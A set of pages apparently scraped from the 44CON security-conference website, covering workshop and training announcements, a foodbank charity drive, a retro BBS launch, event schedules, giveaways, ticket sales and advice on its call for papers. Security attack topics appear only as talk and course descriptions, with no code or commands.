      For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
      • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
      • A step-by-step lab setup guide
      • A detailed course guide to supplement the material covered in the workshop
      Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
      If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.

      Making Britain a Better Place For The Most Vulnerable

      “You measure the degree of civilization of a society by how it treats its weakest members.”

      This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

      The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

      Help us raise money at 44CON

      We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

      Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

      We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

      All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

      Get involved

      We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.

      Building A Permanent Community At 44CON

      44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

      To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

      In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

      Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

      Screen Shot 2018-08-29 at 20.37.05

      For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

      Screen Shot 2018-08-30 at 11.24.12

      Screen Shot 2018-08-30 at 11.14.03Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

      Screen Shot 2018-08-29 at 20.37.41

      Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

       

       

      Screen Shot 2018-08-29 at 20.38.33

      We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

      What To Expect On Thursday Night

      44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

      If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

      HackerOne_black_1

      First of all, the biggest of big big shout outs go to our dear friends and Gold sponsors, HackerOne, without whom this night wouldn’t happen. HackerOne are sponsoring the entire evening, so make sure you thank them for helping out. We’ll have complementary food and drinks from Gin O’Clock onwards courtesy of our Gin O’Clock sponsors Crowdfense, up till 19:00, and at various points and places in the evening from 19:50 onwards courtesy of HackerOne. As well as a selection of Alcoholic drinks, we’ll also have a fantastic Mint and Elderflower Fizz mocktail and soft drinks for those who want to keep things light.

      The evening session starts at 19:00 with Pwning the 44CON Nerf Gun, by Chris Wade and Dave Lodge of PenTest Partners. This is no ordinary stunt hack talk. The Nerf Terrascout is pretty well put together for a toy tank, and it took the PTP guys a heck of a lot of effort in reversing proprietary RF protocols, manipulating the SPI bus and all kinds of wacky techniques, all to hijack the controller in real-time so they can shoot Steve. This is rather odd, as it’s absolutely not going to happen. The crew won’t let Steve get shot…. honest!

      Nicky Bloor will be running a two-hour workshop from 20:00 on Diving Deep into Deserialization, starting with an overview, then diving through exploit and gadget chains into a CTF-style VM for you to play along with (so don’t forget your laptop). Expect this to bend your head a little, but you’ll come out of the other side made of steel.

      Looking for something more blue team than red? From 20:00, Phillipe Arteau will run a two-hour workshop on Machine Learning with the Orange data visualization, machine learning and data mining toolkit. His workshop, Orange is the new Hack is essential for anyone conducting triage and will take you through implementing vulnerability classification at scale. The same skillset can be applied to other contexts such as malware classification, system alert classification and vulnerability management.

      While the workshops are going on, we’ll have Duckies Den in Track 1 from 20:00. Pitch your ideas to our panel of industry duckies, who’ll award beer tokens accordingly. Our sponsors will also get short pitch slots… but the audience get the beers. This year’s theme for our attendees is “Zany cybersecurity ideas that don’t exist, and probably shouldn’t”. Prizes will be awarded for:

      • Best billed idea
      • Most lame duck pitch
      • Most quackers concept

      Could your idea be the nest big thing? Which pitches will fly, and which will sink without a trace? Waddle our panel of duckies take under their wing? Will our sponsors earn a feather in their cap, or will they cry fowl play? It’s not just an eggscuse for duck puns, but we’re sure avian will have a good time!

      If it’s all a bit too much and you want to veg out in front of a film, we’ll be screening all-time classic The Big Lebowski in the coffee area from 20:00. Chill out on the sofas, grab some snacks and see what happens when you meet a stranger in the alps. If you don’t like The Big Lebowski, well, that’s just your opinion, man.

      Last year we had Linux Kernel poetry and Yoga. This year we’re looking for lightning talks with a twist in our Lightning Talk Poetry Slam from 22:00 in Track 1. Slots are 5-15 minutes long, and should feature either in part or in hole, some form of poetry. Haikus, Limericks and epic Rap battles are most welcome. Sign up at the front desk, then come up, either take a shot of Sourz or try a British snack and SHOW US WHAT U GOT.

      TNMOC Guided Tour Giveaway

      Proudly sponsored by F-secure

      Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

      F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.

      logo_f-Secure_Red-web

      The tour will last around 2 hours and cover the full museum collection from the Colossus, war code breaking machines and the history of computing from 1940 to the start of smart phone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

      After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

      How to enter:

      1. Sign up to our newsletter
      2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
      3. Keep an eye on your emails in mid August to see if you’re a winner

      Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

      Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

       

      Steelcon Ticket winners

      44CON Soldering Area at Steelcon

      Steelcon is coming up soon, Steve and Marizel are looking forward to running the soldering area on the 7th of July. We’ll be offering hands on help for those new to soldering or who haven’t had a chance to solder in a while. So come over, say hi and have a go!

      We’ll also have some new sticker designs and a Steelcon exclusive discount code for 44CON tickets!

      And the winners are…

      After being generously provided with two Steelcon tickets to give away to 44CON supporters, last week we did a random draw. If you bought a 44CON2018 ticket and are signed up for our newsletter you had a chance to win.

      We are very happy to announce that Will Deane and Mick Vaites are the winners of the two tickets and were contacted last week.

       

       

       

      SteelCon2018 Tickets up for Grabs!

      Ey up, We’ve got two SteelCon 2018 Tickets to give away. Make like a whippet and you too could be at Sheffield’s finest hacker conference!

      Nah then, 44CON will be exhibiting at SteelCon in July 2018. We’re also running a soldering area and have stickers and reyt good goodies to grab! Even better, we have two tickets to give away! As lovely as it is, Sheffield is uphill both ways in the snow. If you’re heading up from that London, make sure you wrap up warm.

      How to enter:

      For a chance to win one of two SteelCon 2018 tickets all you have to do is this before the 31st of May 2018:

      1. Purchase a 44CON 2018 ticket
      2. Make sure you’re signed up to the 44CON mailing list (you can do this by ticking the relevant box when purchasing your ticket or here).

      Obligatory fine print:

      Don’t stress love, if you’ve already bought a  ticket and are signed up to our mailing list using the same email address for both, you’re already in the draw.
      Winners will be contacted around the 4th of June 2018. If you would rather someone else had your SteelCon 2018 ticket just let us know and we’ll make it happen.
      Marizel is running the draw, and her decision is final. She cannot be bribed with crisps, breadcakes, nor flat caps, although you’re welcome to try.

      We’d love to see you at SteelCon!

      If you’re planning to attend SteelCon 2018 please come over and say hi. We’ll be the ones selling 44CON tickets, sticking things to people and soldering to our <3’s content. The SteelCon team have two 44CON 2018 tickets to give away, so look out for a chance to win these too.

      #####EOF##### 44CONnect March Week – What to expect – 44CON

      44CONnect March Week – What to expect

      We have a fantastic week planned from March 11th-14th with training, a day of talks and of course hanging out with our friends at CRESTCon. If you want to take part there’s still time, just book a seat on Rory’s course, or contact us from your early bird ticket e-mail address.

      Monday 11th March – Training

      Training opens at the Novotel London West for registration at 08:15 GMT with a 09:00 Start. Coffee and breakfast snacks will be available from 08:30. There are opportunities to break throughout the day and of course lunch is provided.

      Training tickets are available until we run out of seats or the 8th of March. There are hardly any seats left, so sales may close before the 8th. Book your seat now.

      Tuesday 12th March – Training

      Once again, doors open at 08:15 GMT. We’ll have breakfast snacks and coffee to keep you going, and lunch is provided in the restaurant.

      Wednesday 13th March – 44CONnect

      If you have an invite to 44CONnect, you’ll get an email telling you where it is. If you don’t, and want one, the easiest way is to book a seat on Rory’s course, or to email us if you’ve bought an Early Bird ticket.

      Doors open from 09:30 – 10:00 for a 10:00 start. Here’s the current schedule (subject to change):

      10:00 – Rory McCune – Container Security
      11:00 – Owen Shearing & Will Hunt – Exploiting in.security
      12:00 – Lightning talk round for attendees
      12:30 – Lunch (included for training attendees only)
      14:00 – Steve Lord – Let The Right One In: Enterprise Containerized Honeyclouds
      15:00 – Dave Ryan – Reporting is dead. Long live reporting.

      From 16:00 we’ll have an open drinks tab, then open the space up to the public from 17:00. If you don’t have an invite, drop @stevelord a DM on twitter around 16:00 and he’ll let you know where to go.

      Thursday 14th March – CRESTCon

      We’re really excited about CRESTCon. 5 Lucky people won CRESTCon tickets through our competition. We’ll have a table there with a new sticker design, so come over and say hello!

      As well as tickets, we’ll be there to answer questions about our CFP, talk about training and of course, check out the talks.

      CRESTCon takes place at the Royal College of Physicians, 11 St Andrews Pl, Regent’s Park, London NW1 4LE. Tickets cost £175 and are available from the CRESTCon site.

      #####EOF##### 44connect – 44CON

      44CONnect – A 1-day invite-only event in March 2019

      44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

      To qualify for an invite, you need to have done one of the following:

      There are 20 tickets available, so make sure you qualify!

      Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

      There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

      Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

      *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

      #####EOF##### cloud – 44CON

      Building a cloud security training platform – Pt 2: Infrastructure As Code

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

      Building an AWS and Azure security training platform

      This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

      Part 1 – Proof of Concept

      The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

      Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

      Continue reading “Building an AWS and Azure security training platform”

      #####EOF##### 2018 – 44CON

      More 2018 44CON Videos Added

      This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

      First Videos From 44CON 2018 Up

      For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

      #####EOF##### How to game the 44CON CFP – 44CON

      How to game the 44CON CFP

      Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

      TL;DR – I want to speak at 44CON

      Ok, then do these things to boost your chances:

      1. Submit a workshop with your talk
      2. Make it clear where else you’ve submitted and/or might/will submit
      3. Include links to other talks you’ve done, video if you have it
      4. Get your talk in early for a better chance of scoring higher
      5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

      Understanding how the CFP works

      The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

      Scoring and voting

      A gypsy fortune teller brings her crystal ball to life to read the future.
      Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

      Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

      When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

      Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

      UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

      Why does it take so long to find out if I’m accepted?

      If you're not sure what's happening, contact us and we'll give you an update.
      If you’re not sure what’s happening, contact us and we’ll give you an update.

      Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

      If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

      For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

      After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5.What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

      Wait, isn’t 44CON a two-track conference?

      All speakers dress like this when preparing submissions.
      All speakers dress like this when preparing submissions.

      Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

      Sometimes we’ll look back at the talks list and look to offer a spot to someone on the list, however sometimes it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first serve basis.

      Hacking the process

      Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

      Submit both Talks and Workshops

      We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get less than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

      If you want to maximise your chances of speaking at 44CON, submit a workshop.

      Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine that if your main talk is about the theory, try a play-along walkthrough on how to do this in practice.

      Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

      I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

      This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

      Tell us where else your talk has been submitted

      44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

      If you’re doing your reveal in Vegas, focus on your process at 44CON.

      Not everyone in the UK can go to BlackHat or Defcon, so there’s not a massive deal in your talk being done in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of effort, but there’s an easy workaround that normally gets big bounces.

      If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

      If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

      Show us your other talks

      A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

      Show us your other talks, even if you're a rockstar.
      Showing us your other talks helps us fit you in.

      This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

      It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

      Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

      Submit your talks early in the process

      Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

      The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

      Remember It’s A Two-Way Street

      We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

      There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

      Coping with rejection

      Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

      If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
      If your talk was rejected, it’s not an indictment of you or your talk.

      To help you deal with the sting of rejection, remember this:

      1. Your talk not being accepted at 44CON does not mean we thought it was bad.
      2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
      3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

      Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

      We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

      2 thoughts on “How to game the 44CON CFP

      Comments are closed.

      #####EOF##### 44CON Assistance tickets – 44CON

      44CON Assistance tickets

      Would you like to attend 44CON but don’t have the means to make it happen?

      We realise that not everyone is able to to fund their own conference attendance. In partnership with our sponsors, we’ve launched an assistance program to provide the opportunity to attend 44CON to those who wouldn’t be able to come otherwise.

      Wire Security logo -2019 assistance

      We are pleased to announce that the first Assistance Sponsor for 44CON 2019, sponsoring two tickets, is Wire Security bvba. Watch this space for details of the 2019 assistance program and application process.

      The fine print:

      • Details provided for assistance ticket applications will be used for the selection process, event registration and hotel reservations in line with the 44CON Privacy Policy.
      • Assistance tickets are not transferable.
      • Attendance to the event is subject to the 44CON house rules.
      #####EOF##### DSC_4772-1 – 44CON

      DSC_4772-1

      #####EOF##### Malware Reverse Engineering – 44CON

      Malware Reverse Engineering

      Presented By: Joxean Koret

      This course provides effective knowledge and hands-on experience on basic malware analysis. It introduces current and relevant techniques that will prepare students to become a proficient malware researcher heavily using IDA Pro.

      This 2 day course will take place on the 11th & 12th March 2019 in London.
      The price is £1,300 (inc VAT). Book your place in our shop now.

      Learning Objectives

      • Understand Windows fundamentals
      • Develop reverse engineering skills
      • Gain familiarity with standard tools like IDA and Volatility
      • Reverse engineer real-world malware

      Course Outline

      Day 1:

      • Introduction to malware
      • Windows fundamentals
      • Executable file formats (PE)
      • Introduction to reverse engineering
      • Introduction
      • Tools & setting up a reverse engineering lab.
      • Brief Introduction to Graph theory
      • Static Analysis: from C to assembler
      • Manual Code reconstruction: from (any) assembler to C

      Day 2:

      • Unpacking
      • Static unpacking
      • IDAPython.
      • Hands on various malwares.
      • Dynamic unpacking
      • Manual reconstruction
      • IDA Python batch automation
      • Memory dumping and analysis with volatility

      Target Audience

      Security staff working in, or looking to work in blue teams on malware analysis, and those with a keen interest in reverse engineering, but without the free time dedicated to developing their skills.

      Student Requirements

      • Knows C
      • Knowledge of assembly language (x86, ARM, …) is advantageous but isn’t required

      What to Bring

      • A working laptop (no Netbooks, no Tablets, no iPads)
      • Intel Core i3 (equivalent or superior) required
      • 8GB RAM required, at a minimum
      • Wireless network card
      • 60 GB free Hard disk space
      • If you’re using a Macbook or Macbook Pro, please bring your dongles!

      Software Requirements

      • Ubuntu Linux installed either on the laptop or on a VM
      • Microsoft Windows as a VM
      • Legal version of IDA (7.0 or higher)

      Students will be provided with

      Copies of the course including all exercises and Virtual Machine images used during the course.

      About the Trainer

      LEAD INSTRUCTOR – Joxean Koret @matalaz

      Joxean Koret has been working for more than 15 years in many different computing areas. He started working as database software developer and DBA for a number of different RDBMS.

      Afterwards he got interested in reverse engineering and applied this knowdlege to the DBs he was working with, for which he has discovered dozens of vulnerabilities in products from the major database vendors, specially in Oracle software.

      He also worked in other security areas like malware analysis and anti-malware software development for an Antivirus company or developing IDA Pro at Hex-Rays.

      Book your 44CON Spring 2019 training course now!

      #####EOF##### More 2018 44CON Videos Added – 44CON

      More 2018 44CON Videos Added

      This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them.

      Matt Lorentzen and Lawrence Munro talk about how to break into a red team (no, not that way, the job way). Lots of juicy info on how to get in there and also a handy toolset for building simulated environments to hone your dark arts.

      The inimitable Kev Sheldrake returns with a talk on using the drag and drop kid’s programming language Scratch to build offensive cyber pathogens. Because why not exploit weird machines with the programming equivalent of Lego?

      Jay Harris of Digital Interruption talks about shifting left through automation and integration into development processes. Looking at different tools and techniques to automate different aspects of the process, Jay delivers a talk, which could only have more automation if he had the talk deliver itself for him.

      Leigh-Anne Galloway and Tim Yunusov closed 44CON 2018 with talks about vulnerabilities in Mobile Point of Sales systems, including those used by the 44CON bus bar. We’d buy them a drink, but according to our card bills we already had…

      David Rogers gives us some deep insight into HMG’s views of IoT Security and the UK’s Code of Practice for Security in Consumer IoT Products and Services.

      We’ll have more 2018 videos up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!

      #####EOF##### 44CON 2019 Standard Ticket | Sense/Net

      44CON is the UK’s largest combined annual Security Conference and Training event and brings the best and brightest security speakers locally and from around the world to the UK.

      The event will start the evening of the 11th September 2019, with the Conference days on the 12th and 13th September 2019.

      We will stop the sale of Standard tickets on 6th September. After that date you will have to purchase a Late Ticket which will cost £399.00 (inc VAT).

      Standard Tickets give you access to everything and include lunch on both Thursday and Friday.

       44CON 2019 Standard Tickets are available in the following ticketing options:

      • Conference Ticket
      • Conference Ticket + exclusive design 44CON 2019 T-Shirt
      • Conference Ticket + hotel room at the IBIS
      • Conference Ticket + exclusive design 44CON 2019 T-Shirt + hotel room at the IBIS

      You can choose between 2 nights (Wednesday and Thursday) or 3 nights (Tuesday to Thursday or Wednesday to Friday, please specify at checkout), including breakfast and WiFi, at:

      • £115 per night for a single room
      • £125 per night for a double or twin room

        You can also book rooms directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON19-ATT at the following rates:

        • £120 per night for a single room
        • £130 per night for a double or twin room

        There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

        For more information, please visit our website 44con.com.

          Conference and training tickets are non-refundable as per our Terms of Service.

          This ticket is NOT transferable. If you want a training course as well you will need to purchase one here when they become available. This ticket will be valid only for the conference on 12th to 14th September. 

           



          TypeEvents
          Vendor44CON
          Tags 44CON, 44CON 2019, Conference, Sense/Net, ticket

          £349.00 GBP
          #####EOF##### 44CON 2018 Workshops – 44CON

          44CON 2018 Workshops

          For a full list of 44CON 2018’s confirmed speakers, please click here.

          Bug Bounties: An introduction and path way to winning at bug bounties

          Presented by: Shubham Shah and Nathan Wakelam

          Today we finally live in a world where we can hack into a diverse range of companies, legally, whenever we want, and get paid for it!

          This workshop is primarily for pentesters wanting to learn about the entire process of participating in bug bounties and how to do it well. This workshop will help participants with the following:

          • Which company do I hack, and which platform or program is right for me?
          • How do I (better) discover assets owned by an organisation to maximise attack surface?
          • How does bug bounty hunting differ from pentesting? (while they share similarities, the methodologies for finding bugs can be vastly different)
          • How do I write a good bug bounty report? (including platform specific tips and many examples)
          • How far do I go when I find a security issue to prove its severity? (mostly based off my experience in this tricky area)
          • What should I expect from a bounty and what do they expect from me? (maintaining good relationships with bounty programs)

          (60 minute workshop)

          Windows Internals and Local Attack Surface Analysis using Powershell

          Presented by: James Forshaw

          Inspecting the internals of Microsoft Windows and discovering interesting attack surfaces for local privilege escalation can be a dark art. Outside of trivial enumeration and fuzzing of drivers there’s little documentation about how you’d find interesting privileged attack surfaces such as brokers, internal RPC/DCOM services and badly configured applications to escape sandboxes and get administrator privileges.

